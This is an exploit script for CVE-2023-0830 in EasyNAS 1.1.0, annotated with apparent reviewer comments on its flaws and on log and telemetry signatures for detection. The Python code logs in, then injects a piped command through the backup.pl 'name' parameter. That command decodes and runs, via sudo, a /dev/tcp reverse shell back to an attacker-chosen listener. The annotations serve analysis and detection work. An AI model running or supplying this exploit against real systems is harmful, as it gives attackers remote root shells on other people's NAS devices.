EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
# Exploit Title: EasyNAS 1.1.0 - Authenticated OS Command Injection Exploit
# Date: 2023-02-9
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)
# Author Blog: https://xbz0n.medium.com
# Version: 1.1.0
# Vendor home page : https://www.easynas.org
# Authentication Required: Yes
# CVE : CVE-2023-0830
#!/usr/bin/python3
# NOTE(review): the shebang sits below the comment header rather than on
# line 1, so it has no effect; the file is a plain module as far as the
# loader is concerned.
import requests
import sys
import base64
import urllib.parse
import time  # NOTE(review): imported but never used in this script
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable the insecure request warning. Every request below passes
# verify=False, i.e. TLS certificate verification is switched off; the
# warning is silenced rather than the certificate problem being handled.
# NOTE(review): `requests.packages.urllib3` is a legacy alias path; current
# requests releases expose urllib3 as a top-level package.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Five positional arguments are required: target, username, password, and
# the listener address/port that are embedded in the payload below.
# NOTE(review): the usage text shows the target with a scheme, but the
# f-strings for the login and backup requests prepend "https://" themselves,
# so the two disagree on what argv[1] is expected to contain.
if len(sys.argv) < 6:
    print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
    sys.exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Create the payload: an interactive shell whose stdio is redirected to
# /dev/tcp/<listenerIP>/<listenerPort>. This plaintext form -- together with
# the `base64 -d | sudo sh` stage in the backup request -- is what appears in
# process command-line telemetry on the target and is the string to alert on.
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])
# Encode the payload in base64 so its shell metacharacters survive the query
# string; the target decodes it again with `base64 -d`.
payload = base64.b64encode(payload.encode()).decode()
# URL encode the payload. urllib.parse.quote leaves "/" unescaped by default,
# so only "+" and "=" from the base64 alphabet are percent-encoded here.
payload = urllib.parse.quote(payload)

# Create the login data: the form fields posted to login.pl.
login_data = {
    'usr':user,
    'pwd':password,
    'action':'login'
}

# Create a session so the cookie set by login.pl is reused for backup.pl.
session = requests.Session()

# Send the login request
print("Sending login request...")
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)

# Check if the login was successful. Success is inferred solely from the
# absence of the login-page title in the response body; any other page that
# happens to contain "Login to EasyNAS" (or a changed login page that omits
# it) is misclassified.
if 'Login to EasyNAS' in login_response.text:
    print("Unsuccessful login")
    sys.exit()
else:
    print("Login successful")

# Send the exploit request. The injection point is the `name` query
# parameter of backup.pl: a leading "|" (%7c) turns the value into the shell
# pipeline `|echo <b64> | base64 -d | sudo sh ||a #`. The `sudo sh` stage
# suggests the web process can escalate without a password (inferred from
# the payload; not verifiable from here). For detection, access-log entries
# for /easynas/backup.pl whose `name` parameter contains "%7c" or "|" are the
# signature of this request (CVE-2023-0830).
timeout = 3
try:
    exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
    # Result reporting is inverted from the usual convention: a non-200
    # status (or the ReadTimeout below) is treated as success, presumably
    # because the injected shell holds the request open and backup.pl never
    # returns normally, whereas a clean 200 means the pipeline did not run.
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
    else:
        print("[-] Exploit failed, system is patched or credentials are wrong.")
except requests.exceptions.ReadTimeout:
    # A read timeout means the server accepted the request but sent no
    # response within `timeout` seconds; treated as the success case (see
    # the note above), although the message carries the "[-]" prefix.
    print("[-] Everything seems ok, check your listener.")
    sys.exit()